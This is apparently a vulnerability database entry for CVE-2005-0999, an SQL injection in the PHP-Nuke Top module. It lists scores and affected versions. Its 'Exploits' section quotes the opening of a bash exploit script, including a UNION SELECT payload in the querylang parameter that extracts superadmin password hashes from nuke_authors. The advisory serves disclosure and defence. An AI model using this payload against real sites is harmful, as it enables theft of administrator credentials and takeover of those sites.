7.5
CVSSv2

CVE-2005-0999

Published: 02/05/2005 Updated: 18/10/2016
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the Top module for PHP-Nuke 6.x up to and including 7.6 allows remote malicious users to execute arbitrary SQL commands via the querylang parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

francisco burzi php-nuke 6.5_final

francisco burzi php-nuke 6.5_rc1

francisco burzi php-nuke 7.1

francisco burzi php-nuke 7.2

francisco burzi php-nuke 6.0

francisco burzi php-nuke 6.6

francisco burzi php-nuke 6.7

francisco burzi php-nuke 7.5

francisco burzi php-nuke 7.6

francisco burzi php-nuke 6.5

francisco burzi php-nuke 6.5_beta1

francisco burzi php-nuke 6.9

francisco burzi php-nuke 7.0

francisco burzi php-nuke 7.0_final

francisco burzi php-nuke 6.5_rc2

francisco burzi php-nuke 6.5_rc3

francisco burzi php-nuke 7.3

francisco burzi php-nuke 7.4

Exploits

#/bin/bash # This is just basic-ly modulesphp?name=Top&querylang=union%20select%200,pwd,0,0%20from%20nuke_authors%20where%20radminsuper=1 # works thou /str0ke # # PHPNuke Top Module Remote SQL Injection # by Fabrizi Andrea 2005 # andreafabrizi [at] gmailcom # # Work with the PHPNuke latest version! # URL=$1; PATH="$2/"; ANON="ano ...